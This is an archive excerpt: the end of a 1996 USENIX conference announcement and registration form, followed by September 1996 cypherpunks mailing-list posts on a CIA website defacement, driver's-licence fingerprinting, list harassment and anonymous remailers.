Real-Time Audio Tool Isidor Kouvelas and Vicky Hardman, University College London On Designing Lightweight Threads for Substrate Software Matthew Haines, University of Wyoming High-Performance Local-Area Communication With Fast Sockets Steven H. Rodrigues, Thomas E. Anderson, and David E. Culler, University of California, Berkeley 2:00-3:30: CACHING and STASHING An Analytical Approach to File Prefetching Hui Lei and Dan Duchamp, Columbia University Optimistic Deltas for WWW Latency Reduction Gaurav Banga, Fred Douglis, and Michael Rabinovich, AT&T Research A Toolkit Approach to Partially Connected Operation Dan Duchamp, Columbia University 4:15-5:45: JOINT CLOSING SESSION Severe Tire Damage's Stupid Mbone Tricks - A Lecture/Demonstration INVITED TALKS ============= WEDNESDAY, JANUARY 8 11:00-12:30: Nomadicity and the IETF Charles E. Perkins, IBM T.J. Watson Research Center 2:00-3:30: If Cryptography Is So Great, Why Isnt It Used More? Matt Blaze, AT&T Research 4:00-5:00: The Inktomi Web Search Engine Eric Brewer, University of California, Berkeley THURSDAY, JANUARY 9 9:00-10:30: The AltaVista Web Search Engine Louis Monier, Digital Equipment Corporation 11:00-12:30: IPv6: The New Version of the Internet Protocol Steve Deering, Xerox Palo Alto Research Center 2:00-3:30: Highlights from 1996 USENIX Conferences and Workshops 4:00-5:30: Inferno Rob Pike, Bell Labs FRIDAY, JANUARY 10 9:00-10:30: Measuring Computer Systems: How to Tell the Truth with Numbers Margo Seltzer and Aaron Brown, Harvard University 11:00-12:30: Stupid Net Tricks Bill Cheswick, Bell Laboratories 2:00-3:30: Finding Bugs in Concurrent Programs Gerard J. Holzmann, Bell Laboratories USELINUX PROGRAM ================= USELINUX DEVELOPERS WEDNESDAY, JANUARY 8 9:00-10:30: Linux: What It Is and Why It Is Significant Mark Bolzern, Work Group Solutions Tom Miller, X Engineering Software Systems 11:00-12:30: The Sparc Port of Linux David S. Miller, Rutgers CAIP Miguel de Icaza, Instituto de Ciencias Nucleares, Ciudad Universitaria, Universidad Nacional Autonoma de Mexico 2:00-3:30: Advanced Device Drivers Alessandro Rubini, Universita di Pavia 4:00-5:00: Future of the Linux Kernel Linus Torvalds, Helsinki University THURSDAY, JANUARY 9 9:00-10:30: Real Time Victor Yodaiken and Michael Barabanov, New Mexico Institute of Technology 11:00-12:30: /proc Stephen Tweedie, Digital Equipment Corporation 11:00-12:30: The Pluggable Authentication Modules (PAM) Framework Ted Tso, Massachusetts Institute of Technology 2:00-3:30: Standards Heiko Eissfeldt, Unifix Software 4:00-5:30: Connecting Legacy and Open Systems Michael Callahan, Stelias Computing, Inc. USELINUX BUSINESS ================= FRIDAY, JANUARY 10 9:00-9:30: Linux: What It Is and Why It Is Significant Mark Bolzern, Work Group Solutions Tom Miller, X Engineering Software Systems 9:30-10:30: Linux and Distribution Channels: Ways to Enter the Commercial Market Dan Rosenberg, Stromian Technologies 11:00-12:30: Using Linux in Your Business: A Business Justification Presented by Linux International 2:00-4:00: The Linux Market: Who, What, Where, When and Why? Presented by Linux International USELINUX PRESENTATIONS AND CASE STUDIES DESCRIPTIONS ==================================================== WEDNESDAY, JANUARY 8, 7:30pm - 11:00pm The Use of Linux for Dedicated Systems Chel van Gennip, HISCOM BV Perceptions: A Strategic Deployment of Linux in the Health Care Environment Greg Wettstein, Velocity LLC The Future of the Linux Desktop Ken Apa, Governors State University; Jim Fetters, Chicago Mercantile Exchange; Joe Sloan, Toyota Motor Sales USA The Classroom of the Future Karl Jeacle, Broadcom Eireann Research Ltd. THURSDAY, JANUARY 9, 6:00pm - 10:30pm Using GNUstep to Deploy User Applications Scott Christley, NET-Community Embedded, Turnkey and Real Time Phil Hughes, Linux Journal Developing Linux-based Electronic Markets for Internet Trading Experiments Paul J. Brewer, Georgia State University VENDOR EXHIBITION ================= Wednesday, January 8, Noon - 7:00pm Thursday, January 9 10:00am - 4:00pm If you cannot make it to the conference but would like to visit the exhibition, please contact Cynthia Deno, Exhibit Coordinator, at 408-335-9445 or cynthia at usenix.org. Vendors: ======== The USENIX 97 Exhibition offers: "Two days of exposure to the cream of the UNIX User Community." -Neil Groundwater, Enterprise Management Group, SunSoft, Inc. Please contact: Cynthia Deno, Exhibit Co-ordinator Tel: 408-335-9445 Fax: 408-335-5327 cynthia at usenix.org GENERAL CONFERENCE INFORMATION Birds-of-a-Feather Sessions (BoFs) ================================== Tuesday, Wednesday, and Thursday evenings Do you have a topic that youd like to discuss with others? Birds-of-a-Feather sessions may be perfect for you. BoFs are interactive, informal gatherings for attendees interested in a particular topic. Schedule your BoF in advance. Call the Conference Office at 714.588.8649 or send email to conference at usenix.org. Topics are announced at the conference. BoFs may also be scheduled on-site. The Guru is IN ============== Have a question thats been bothering you? Try asking a USENIX guru! Noted experts from the USENIX community will be available to spark controversy and answer questions. Please contact the Invited Talks Coordinators via email to ITusenix at usenix.org if you would like to volunteer your expertise. Works-in-Progress Reports ========================= Short, pithy, and fun, Works-in-Progress Reports (WIPs) introduce interesting new or ongoing work. If you have work to share or a cool idea not quite ready to be published, a WIP Report is for you! You will receive insightful feedback. We are particularly interested in presenting student work. WIPs are scheduled within the technical sessions program. To reserve a slot, send email to wips at usenix.org. Topics are announced on-site. CONFERENCE SERVICES Terminal Room ============= Internet and dial-out access are provided in the Terminal Room. The Terminal Room will be open throughout the conference week. Look for details posted to comp.org.usenix. Attendee Message Service ======================== Electronic message service will be available Monday, January 6 through Friday, January 10. Electronic messages to conference attendees should be addressed: first_lastname at conference.usenix.org. HOTEL AND TRAVEL INFORMATION: ============================ Hotel Discount Reservation Deadline: Friday, December 20, 1996 USENIX has negotiated special rates for conference attendees at the Anaheim Marriott. Contact the hotel directly to make your reservation. You must mention USENIX to get the special rate. A one-night room deposit must be guaranteed to a major credit card. To cancel your reservation, you must notify the hotel at least 24 hours before your planned arrival date. Anaheim Marriott 700 West Convention Way Anaheim, CA 92802 Toll Free: 800.228.9290 Phone: 714.750.8000 Reservation Fax: 714.750.9100 Room Rates: $107/Single, $117/Double (plus local taxes, currently at 15%) Need a Roommate? Usenet facilitates room sharing. If you wish to share a room, post to and check comp.org.usenix.roomshare. Discount Airfares and Car Rentals Special discounted air fares and car rentals are available only through JNR, Inc., a full service travel agency. All restrictions apply. Please call JNR for details. Call toll free 800.343.4546 in the USA and Canada or telephone 714.476.2788. STUDENT STIPENDS AND DISCOUNTS ============================== TUTORIALS: A limited number of seats in each tutorial are reserved for full-time students at the very special rate of $70.00 per tutorial. To take advantage of this, you must telephone the conference office to confirm availability and make a reservation. You will receive a reservation code number which must appear on your registration form. Your registration form with full payment and a photocopy of your current student ID card must arrive within 14 days from the date of your reservation. If they do not arrive by that date, your reservation will be canceled. This special fee is non-transferable. TECHNICAL SESSIONS: USENIX offers a discount rate of $75 for technical sessions for full-time students. You must include a copy of your current student I.D. card with your registration. This fee is not transferable. STIPENDS: Student stipends are available to pay for travel, living expenses and registration fees to enable full-time students to attend this conference. To apply for a stipend, read comp.org.usenix six to eight weeks before the conference, visit our Web site, http://www.usenix.org, or contact Diane DeMartini (diane at usenix.org) for more information. ******************************************************************** To obtain descriptions concerning the tutorials and technical sessions, and full conference information, please contact USENIX via any one of the following methods: * Visit our Website, URL: http://www.usenix.org * Send email to our mailserver at: info at usenix.org Your message should contain the line: send usenix97 conferences * Contact: USENIX Conference Office, 22672 Lambert St., Suite 613, Lake Forest, CA USA 92630 Phone: 714-588-8649 Fax: 714-588-9706 Email: conference at usenix.org ******************************************************************** USENIX ASSOCIATION The USENIX Association brings together the community of engineers, system administrators, scientists, and technicians working on the cutting edge of computing. Its technical conferences are the essential meeting grounds for the presentation and discussion of the most advanced information on new developments in all aspects of advanced computing systems. ==========================CUT HERE================================ REGISTRATION FORM - USENIX 1997 TECHNICAL CONFERENCE January 6-10, 1997, Anaheim, California ================================================================= WWW Please complete the form below and return with full payment to: USENIX CONFERENCE OFFICE 22672 Lambert St., Suite 613, Lake Forest, CA 92630 Telephone: (714) 588-8649 / FAX Number (714) 588-9706 Electronic Mail Address: conference at usenix.org Office Hours: 8:30am - 5:00pm Pacific Time NAME________________________________________________________________ (first) (last) FIRST NAME FOR BADGE____________________________ USENIX Member ID____________________ COMPANY OR INSTITUTION______________________________________________ MAILING ADDRESS_____________________________________________________ (mail stop) ____________________________________________________________________ CITY___________________________STATE_____COUNTRY________ZIP____________ TELEPHONE NO:_________________________FAX NO._________________________ NETWORK ADDRESS______________________________________________________ (one only please) The address you provide will be used for all future USENIX mailings unless you notify us in writing. ATTENDEE PROFILE Please help us serve you better. By answering the following questions, you help us plan our activities to meet members' needs. All information is confidential. [ ] I do not want to be on the attendee list [ ] I do not want my address made available for other than USENIX mailings [ ] I do not want USENIX to email me notices of Association activities. What is your affiliation? [ ]academic [ ]commercial [ ]gov't [ ]R&D What is your role in purchase decision? 1.[] final 2.[] specify 3.[] recommend 4.[] influence 5.[] no role What is your job function? (check one) 1.[] system/network administrator 2.[] consultant 3.[] academic/research 4.[] developer/programmer/architect 5.[] system engineer 6.[] technical manager 7.[] student 8.[] security 9.[] webmaster How did you hear about this meeting: 1.[] USENIX brochure 2.[] newsgroup/bulletin board 3.[] ;login: 4.[] World Wide Web 6.[] from a colleague 7.[] magazine What publications or newgroups do you read releated to advanced computing systems?_____________________________________________ ================================================================= TUTORIAL PROGRAM Select only one full-day tutorial per day - 9:00am-5:00pm Monday, January 6, 1997 ======================== [ ] M1: Beginning Perl Programming [ ] M2: Kerberos Approach to Network Security [ ] M3: Introduction to Java [ ] M4: Secure Java Programming [ ] M5: Windows NT and Windows 95 [ ] M6: UNIX Network Programming [ ] M7: Topics in System Administration [ ] M8: How Networks Work [ ] M9: System and Network Performance Tuning [ ] M10: Inside the Linux 2.0 Kernel Second Choice of first is filled:____________________________ Tuesday, January 7, 1997 ========================= [ ] T1: UNIX Security Tools [ ] T2: CGI and WWW Programming in Perl [ ] T3: Security on the Web [ ] T4: Creating Effective User Interfaces [ ] T5: Java Applets and the AWT [ ] T6: Setting Up and Administering a Web Server [ ] T7: Security for Software Developers [ ] T8: Solaris System Administration [ ] T9: IP version 6 [ ] T10: Writing Device Drivers Under Linux Second Choice of first is filled:____________________________ TUTORIAL PROGRAM FEES (January 6-7) Two full-day tutorials.................$620 $_________ CEU credit (optional)..................$ 30 $_________ One full-day tutorial..................$335 $_________ CEU credit (optional)..................$ 15 $_________ Late fee applies if postmarked after Friday, November 22, 1996........Add $ 50 $_________ Full-Time Students (see "STUDENT STIPENDS AND DISCOUNTS" above on how to obtain code) CODE NO:______________________ $ 70 $_________ CODE NO:______________________ $ 70 $_________ TECHNICAL SESSION FEES Current Member Fee.....................$340 $________ (Applies to current USENIX, EurOpen national groups, JUS and AUUG, and Linux Int'l members) Non-Member or Renewing Member Fee**....$410 $________ **Join or renew your USENIX/SAGE membership and attend the conference for same low price -Check here [ ] Join or renew your SAGE membership...Add $ 25 $_________ (You must be a member of USENIX) Late fee applies if postmarked after Friday, November 22, 1996..........Add $ 50 $_________ Full-Time Student Fee*: pre-registered or on-site......$ 75 $_________ Full-Time Student Fee* including USENIX membership fee......$100 $_________ *Students must include photocopy of current student I.D. TOTAL ENCLOSED...................$_________ PAYMENT MUST ACCOMPANY THIS FORM. Payment in US Dollars must accompany this form. Purchase orders, vouchers, telephone or email registrations cannot be accepted. [ ] Payment Enclosed (Make check payable to USENIX Conference) CHARGE TO MY: ___VISA ___MASTERCARD ___AMERICAN EXPRESS ___DINERS CLUB ACCOUNT NO.______________________________________ EXP. DATE___________ _______________________________________/___________________________ Print Cardholder's Name Cardholder's Signature You may fax your registration form if paying by credit card to USENIX Conference Office, fax: 714-588-9706. (To avoid duplicate billing, please DO NOT mail an additional copy.) REFUND CANCELLATION POLICY: If you must cancel, all refund requests must be in writing and postmarked no later than December 27, 1996. Telephone cancellations cannot be accepted. You may telephone to substitute another in your place. From james_oshea at smb.com Thu Sep 19 11:55:01 1996 From: james_oshea at smb.com (James P. O'Shea III) Date: Fri, 20 Sep 1996 02:55:01 +0800 Subject: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building In-Reply-To: <01BBA60C.5AD5CCC0@misd145.cern.ch> Message-ID: <9609191046.ZM9184@ws232034> On Sep 19, 9:24am, Batman wrote: > Subject: RE: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal B >For the 200th time, unsubscrive me of your fucked mail lists. > >-- End of excerpt from Batman Apologies if you receive more than one copy of this message, but I'm auto-replying to your message to handle the flood: Redistribution to the list from which you originally received the problem message is kindly requested. Thank you for bringing this matter to our attention. The email or posting you have seen falsely represents Smith Barney and its employees. These are erroneous postings that did not originate from anyone employed by our firm, and therefore we cannot directly stop them from occurring. However we have advised the companies we believe to have serviced the originator of these messages and we are pursuing all possible steps to end this fraud. Unfortunately some people abuse the Internet and we regret any inconvenience they may have caused you. There are currently no mailing lists maintained in the smb.com domain, so you were not subscribed to any list. If you receive any further messages of this nature, they are the product of the same spurious source. We're sorry for any inconvenience you may have experienced as a result of this unfortunate abuse of the 'Net. Further queries via email to postmaster at smb.com please. Thanks. -James postmaster, network security, etc. ----------------------- James P. O'Shea III Smith Barney Inc. postmaster at smb.com -- ---------------------------->>>>Note NEW PAGER numbers 6/27/96 James P. O'Shea III 212-723-5885 (voice) Systems Administrator 212-723-5021 (fax) Smith Barney Inc. 390 Greenwich/6 West 800-225-0256 PIN 306296 (alpha page) jposhea3 at panix.com 917-820-5855 (digital page) james_oshea at smb.com From dlv at bwalk.dm.com Thu Sep 19 12:09:27 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Fri, 20 Sep 1996 03:09:27 +0800 Subject: CIA hacked In-Reply-To: Message-ID: <5w5HuD6w165w@bwalk.dm.com> Mike van der Merwe writes: > I'm sure we will find out in a few years that Microsoft invented the > Net. Or brought it to the masses. Or saved it from a certain and > early demise. Or all of the above. > JAMES SEYMOUR Dr. John M. Grubor created the 'net. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From skeeve at skeeve.net Thu Sep 19 12:14:52 1996 From: skeeve at skeeve.net (Skeeve Stevens) Date: Fri, 20 Sep 1996 03:14:52 +0800 Subject: CIA hacked In-Reply-To: Message-ID: <199609191511.BAA24236@myinternet.myinternet.net> You, Mike van der Merwe, shaped the electrons to say: + + +Hi everybody + +Heh! This one's good for a laugh :-)) + +http://www.odci.gov/cia + +Seems the DOJ hack was a good inspiration. Heh! Life's good when you're +willing to work at it. + +Later +Mike Did you or anyone get a mirror of the site?! I wanna set one up! ;) -------------------------------------------------------------------- Skeeve Stevens Email: skeeve at skeeve.net CEO/The Big Boss/All round nice guy URL: http://www.skeeve.net/ MyInternet Australian Anglicans Online http://www.myinternet.net/ http://www.anglican.asn.au/ Phone: (+612) 869-3334 Mobile: (0414) SKEEVE [+61414-753-383] Key fingerprint = D2 7E 91 53 19 FE D0 5C DE 34 EA AF 7A 5C 4D 3E From mikev at is.co.za Thu Sep 19 12:24:18 1996 From: mikev at is.co.za (Mike van der Merwe) Date: Fri, 20 Sep 1996 03:24:18 +0800 Subject: CIA hacked In-Reply-To: <199609191511.BAA24236@myinternet.myinternet.net> Message-ID: On Fri, 20 Sep 1996, Skeeve Stevens wrote: > Did you or anyone get a mirror of the site?! I wanna set one up! ;) Check out http://titus.is.co.za/mikev/cia_hack Later Mike ____________________________________________________________________ I'm sure we will find out in a few years that Microsoft invented the Net. Or brought it to the masses. Or saved it from a certain and early demise. Or all of the above. JAMES SEYMOUR From DMiskell at envirolink.org Thu Sep 19 12:31:50 1996 From: DMiskell at envirolink.org (Daniel Christopher Miskell) Date: Fri, 20 Sep 1996 03:31:50 +0800 Subject: All Bets Off Message-ID: >On Tue, 17 Sep 1996, Jeff Davis wrote: > >> > Just so this isn't hanging in cyberspace forever, my $5,000 bet for >> > anyone to prove the TWA 800 flight was downed by a U.S. missile is now >> > *off the table*. >> >> I heard through the family grapevine that they have pictures of a Stinger >> taking out the plane they're analyzing in the Pentagon. There are 220+ >> Stingers *missing* in the US, so its not like they have to smuggle them >> in... (That's not proof by any means, but *my* family grapevine has always >> been very reliable. The cousin who told me this has a Dad who flew as >> the intelligence officer observer on Bronco flights out of Quang Tri for >> 18 months, rotating out just before the base was over run in May of '72.) > >Does this cousin also have an aunt who lived next door to Joe Montana's >babysitter? I might know his father ... > >Ask your family grapevine about the stinger's op altitude, and the >altitute of the TWA when it broke up - I don't have Jane's lying around, >but it seems that the TWA plane was a tad bit high for a stinger. > >- r.w. I recall that Tom Clancy, who has written a number of military fiction novels, for which he has done endless notebooks full of research for, made a statement about this. He said, simply, that the TWA jet's explosion was at such an altitude, that even if someone did it from a boat directly under, it was still far too high for a Stinger missile to reach, much less dammage. Just thought I would throw that out there. Tom Clancy is not a military-hired brain, but to make his novels realistic and to do justice to the people he portrays, he does a LOT of research. He is a highly respected author, and I have no doubt that his statement is based on his personal findings, collected for a previous novel. -- If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess? -- Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html From ericm at lne.com Thu Sep 19 13:12:47 1996 From: ericm at lne.com (Eric Murray) Date: Fri, 20 Sep 1996 04:12:47 +0800 Subject: CIA web site hacked Message-ID: <199609191557.IAA06913@slack.lne.com> Chain: 2 Mike van der Merwe writes: > > > Hi everybody > > Heh! This one's good for a laugh :-)) > > http://www.odci.gov/cia > > Seems the DOJ hack was a good inspiration. Heh! Life's good when you're > willing to work at it. www.odci.gov appears to have been shut down (as of 11:50am EDT). Did anyone make a copy of the hacked pages? From DMiskell at envirolink.org Thu Sep 19 13:37:04 1996 From: DMiskell at envirolink.org (Daniel Christopher Miskell) Date: Fri, 20 Sep 1996 04:37:04 +0800 Subject: A daily warning regarding Timothy C. May Message-ID: >Daniel Christopher Miskell wrote: >> Timothy C. May is a lying sack of shit. >> Right. And you had to insult him through use of anonymous mail. Boy, >> you're real brave, shedding the light to the rest of the cypherworld >> in such a manner. >> Apologies for the spam, but there was no address, obviously. >> If in fact we are the only intelligent life on this planet, why the >> fuck are we in this goddamn mess? > >A. There's probably no intelligent life in the (this) universe, and the > Uncertainty Principle is probably wrong, too (i.e., there is really > no Free Will, so there are no valid answers either), -and- > >B. If you were truly intelligent, would you want to come here? I find the lack of seperators between what anon wrote, what I wrote, and what my sig said amusing. Well, I get the feeling that I am intelligent. I tested for acceptance into Mensa, and after finding out my IQ was 156, I felt I had better things to do than include myself with the 'intelligence elite'. This list is a cool spot. I find out a lot of things I didn't know about, and hear a lot of things that the media isn't going to cover, things called 'rumor' because they don't want them to be true. Who knows, maybe we are all dumb. Either way, it does no good to lament wether or not we have sufficient intelligence to be referred to as 'itelligent life.' Personally, I find that it is far more fun to keep on trucking with life, rather than debate a moot point that we have no control over. -- If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess? -- Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html From skeeve at skeeve.net Thu Sep 19 13:42:27 1996 From: skeeve at skeeve.net (Skeeve Stevens) Date: Fri, 20 Sep 1996 04:42:27 +0800 Subject: CIA hacked In-Reply-To: Message-ID: <199609191540.BAA24455@myinternet.myinternet.net> You, Mike van der Merwe, shaped the electrons to say: + + +On Fri, 20 Sep 1996, Skeeve Stevens wrote: + +Check out http://titus.is.co.za/mikev/cia_hack Thanx... An Australian Mirror of the site is up on http://www.skeeve.net/cia/ the doj mirror is http://www.skeeve.net/doj/ -------------------------------------------------------------------- Skeeve Stevens Email: skeeve at skeeve.net CEO/The Big Boss/All round nice guy URL: http://www.skeeve.net/ MyInternet Australian Anglicans Online http://www.myinternet.net/ http://www.anglican.asn.au/ Phone: (+612) 869-3334 Mobile: (0414) SKEEVE [+61414-753-383] Key fingerprint = D2 7E 91 53 19 FE D0 5C DE 34 EA AF 7A 5C 4D 3E From wombat at mcfeely.bsfs.org Thu Sep 19 13:53:04 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Fri, 20 Sep 1996 04:53:04 +0800 Subject: A Bizarre Increase in the Ad Hominems Here In-Reply-To: <3240C258.3464@gte.net> Message-ID: > > Pardon me for butting in, but "nutcase and liar" are some pretty > significant slurs, moreso than "putz" or "bozo" or whatever. I'd say > there's gotta be a helluva story here. Background, anyone? > Don't go there, Dave. ;) Just stay home and watch some soaps, and spare us the agony ... Consider this a plea, rather than an attempt at censorship :) - r.w. From tcmay at got.net Thu Sep 19 14:02:44 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 20 Sep 1996 05:02:44 +0800 Subject: DL in exchange for fingerprint Message-ID: At 12:23 PM 9/19/96, Jeff Barber wrote: >Oh joy. You no longer need to be arrested to get fingerprinted >in Georgia. On the front page of Wednesday's Atlanta Journal, under >the headline "Now you can get driver's license in minutes": ... >Just what I would have called it: a great idea. Is it true that 31 >other states take your fingerprint as part of the license application? >I feel sick. California has it, so that's what about 20 million drivers have to put up with. I'd expect all the states to have this within a few years. (Yes, I disliked being thumb-printed, but I could see no viable alternative. I'm sure Duncan has some scheme to declare himself a Botswanan exchange student, but I decided being thumb-printed was the lesser hassle.) By the way, the next rev of the California driver's license will reportedly have one's *Social Security Number* printed on the card! So much for the statement clearly printed on my card: "For social security and tax purposes -- not for identification." Paraphrasing that famous quote, just which part of "not for identification" don't they understand? (Indeed, I am asked for my SSN in many places. A few times I've refused to give it. Once the clerk just said, "Fine, I have it here on my computer anyway." Refusing to give it is probably no longer meaningful, due to massively cross-linked data bases.) Again, we desperately need an infrastructure of "credentials without identity." --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From sunder at brainlink.com Thu Sep 19 14:16:28 1996 From: sunder at brainlink.com (Ray Arachelian) Date: Fri, 20 Sep 1996 05:16:28 +0800 Subject: cypherpunk listserve usefulness In-Reply-To: <199609181601.JAA28161@slack.lne.com> Message-ID: On Wed, 18 Sep 1996, Eric Murray wrote: > No, filtering your mail does NOT make you a censor, unless you're > filtering the mail before it is gatewayed to a list or newsgroup > where other people read it. And they didn't ask you to do the filtering. Yep, matter of fact that's what the light versions of cpunx are for. 's matter of fact I happen to run one of them and my subscribers are happier without all the noise and flames here. :) as for me, I don't mind the noise or the flames, I tend to hit the "D" key quite often. :) ( to subscribe to it, send a message to my address with the >SUBJECT< "fcpunx subscribe" or "fcpunx help" for help.) > Filtering your own mail is akin to choosing which articles > in a magazine to read. It's not censorship if you don't > read an article; it's the article's author's fault that > he didn't make the article interesting enough for you to read. Yep. > I think that anyone who has to work for a living must filter > the cypherpunks list in order to cut out some of the crap. > Most people just don't have the time to wade through everything, and > filtering some of it out is a good start on upping the S/N ratio. > What you consider Signal and Noise however is entirely up to you. Especially since Cypherpunks isn't the only list I subscribe to. I go through about 200-300 messages a day, and 80% of them get delted without a single look. I tend to read the 1st few messages of a topic, and if it's noise, it gets axed. :) ============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From batman at infomaniak.ch Thu Sep 19 14:33:04 1996 From: batman at infomaniak.ch (Batman) Date: Fri, 20 Sep 1996 05:33:04 +0800 Subject: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal Building In-Reply-To: <9609191046.ZM9184@ws232034> Message-ID: On Thu, 19 Sep 1996, James P. O'Shea III wrote: > On Sep 19, 9:24am, Batman wrote: > > Subject: RE: Bernstein hearing reminder: THIS Friday 11:45AM, SF > Federal B > >For the 200th time, unsubscrive me of your fucked mail lists. > > > >-- End of excerpt from Batman > > > > Apologies if you receive more than one copy of this message, but I'm > auto-replying to your message to handle the flood: > > Redistribution to the list from which you originally received the > problem > message is kindly requested. > > > Thank you for bringing this matter to our attention. The email or > posting you have seen falsely represents Smith Barney and its > employees. These are erroneous postings that did not originate from > anyone employed by our firm, and therefore we cannot directly stop > them from occurring. However we have advised the companies we > believe > to have serviced the originator of these messages and we are > pursuing > all possible steps to end this fraud. Unfortunately some people > abuse > the Internet and we regret any inconvenience they may have caused > you. > > There are currently no mailing lists maintained in the smb.com > domain, > so you were not subscribed to any list. If you receive any further > messages of this nature, they are the product of the same spurious > source. > > We're sorry for any inconvenience you may have experienced as a > result > of this unfortunate abuse of the 'Net. > > Further queries via email to postmaster at smb.com please. > > Thanks. > -James > postmaster, network security, etc. > > ----------------------- > James P. O'Shea III > Smith Barney Inc. > postmaster at smb.com > > > -- > > ---------------------------->>>>Note NEW PAGER numbers 6/27/96 > James P. O'Shea III 212-723-5885 (voice) > Systems Administrator 212-723-5021 (fax) > Smith Barney Inc. > 390 Greenwich/6 West 800-225-0256 PIN 306296 (alpha page) > jposhea3 at panix.com 917-820-5855 (digital page) > james_oshea at smb.com > > > Dear Sir, I thank you for your e-mail. This has began 6 months ago, when a guy has started to subscrive me on several lists and i got 300 mails/day. this guy is sricca at worldcom.ch, he's only 15 years old and i've noticed several complains here in Switzerland for him. I sent a mail to his admin root at wolrdcom.ch, but i think they must be good friends, as i never received a reply from him. What i can do is to ask the mail-list admins to not let him subscribe me again. I don't understand, a mail-list as cypherpunhks where people talk about security, and if i want, i can subscrive in there all the e-mails i want :( couldn't you resolve this problem to be sure that i will no more talk about fucked mail-lists ? It would be so great, so fantastic to forget cypherpunk mail list (and the others) as soon as possible. Please, do something. Kind regards, Joao Bento Joao.Bento at cern.ch http://nicewww.cern.ch/~jbe From weber at iez.com Thu Sep 19 14:53:09 1996 From: weber at iez.com (Rolf Weber) Date: Fri, 20 Sep 1996 05:53:09 +0800 Subject: GLOBAL ALERT: GERMAN GOVERNMENT PUSHES BLOCKAGE OF NETHERLANDS WEB SITES In-Reply-To: <9609191310.AA11909@spibm02> Message-ID: <9609191644.AA15421@spibm02> > > it was *not* the german government, it was the public prosecutor > general, who pushed this blockage. > i got a lot of replies to this. :-) i did translate "government" word for word, but it's written more in the meaning of "state". and in this meaning, it's surely the right word. sincerely, rolf From stewarts at ix.netcom.com Thu Sep 19 15:02:04 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Fri, 20 Sep 1996 06:02:04 +0800 Subject: DL in exchange for fingerprint Message-ID: <199609191845.OAA02427@attrh1.attrh.att.com> > "We keep a memory bank that matches your fingerprints with your > license," [DoPS spokesman] said. "In other words, if you went to > get a new license with a false birth certificate and your > fingerprint didn't match the name, you wouldn't get a license. Totally bogus - _my_ birth certificate didn't have my fingerprints on it :-) Now, it may help stop people from getting duplicate licenses, assuming they use the same finger each time and don't have the sense to put rubber cement or ridge filler or something on their fingers first (and assuming, of course, that the system actually _checks_ the fingerprint in real time, rather than just recording it.) >Just what I would have called it: a great idea. Is it true that 31 >other states take your fingerprint as part of the license application? >I feel sick. Wouldn't be surprising; you didn't think you lived in America, did you? # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From EALLENSMITH at ocelot.Rutgers.EDU Thu Sep 19 15:03:18 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Fri, 20 Sep 1996 06:03:18 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <01I9NVPGAM908Y4ZFH@mbcl.rutgers.edu> From: IN%"jbugden at smtplink.alis.ca" 17-SEP-1996 01:09:37.71 Mind trying to do 72-column or so formatting, BTW? >Canada has a single payer system and we spend about two thirds as much as t= >he >U.S. on health care as a percentage of G.N.P. We manage to insure all Canad= >ians >while about 35% of people in the U.S. have *no* health insurance. Canada also has less smoking, teenage pregnancy, and various other factors which are known to raise health insurance costs. I've seen some studies in which these _entirely_ account for the differences... and keep in mind the rate of health care inflation of the two countries (depending on the study, either the same or higher for Canada.) -Allen From EALLENSMITH at ocelot.Rutgers.EDU Thu Sep 19 15:19:19 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Fri, 20 Sep 1996 06:19:19 +0800 Subject: Judge Kozinski Responds Message-ID: <01I9NW5EG7388Y4ZFH@mbcl.rutgers.edu> From: IN%"liberty at gate.net" "Jim Ray" 17-SEP-1996 02:14:28.24 To: IN%"cypherpunks at toad.com" CC: Subj: Judge Kozinski Responds >The statement about anonymous remailers was largely >accurate. I'm not sure that the fact that you (or some of >your associates) are willing to block people from getting >anonymous mail is a sufficient safeguard. Some may not be, >and it only takes one or two who do not adhere to the code >to make life miserable for the rest of us. > >We agree about the need for privacy, but I'm not at all sure >why the right to send messages anonymously trumps the >recipient's right to know who's addressing him. Getting an >anonymous message--even one that is not harassing or >threatening--is an invasion of my privacy. As for The essential problem with this viewpoint is that the right the receiver has is to ignore the message. If he doesn't want to receive anonymous messages, he should set up a mail filtration program that will do a good enough job of filtering them out. Spammed messages can be countered with Internet charging (neccessary anyway for the long-term health of the Net), as can mailbombing. That leaves individual messages that may be offensive (including, apparantly in his case, offensive by virtue of being anonymous), but if offensiveness meant someone should have the right to stop the emission of speech, that would mean the Christian Coalition would have the right to stop speech on evolution, the PC types would have the right to stop speech on genetic differences in intelligence (see Stephen Jay Gould for them on this issue - even leaving aside racial questions which are separate from the individual ones), etcetera. -Allen From sunder at brainlink.com Thu 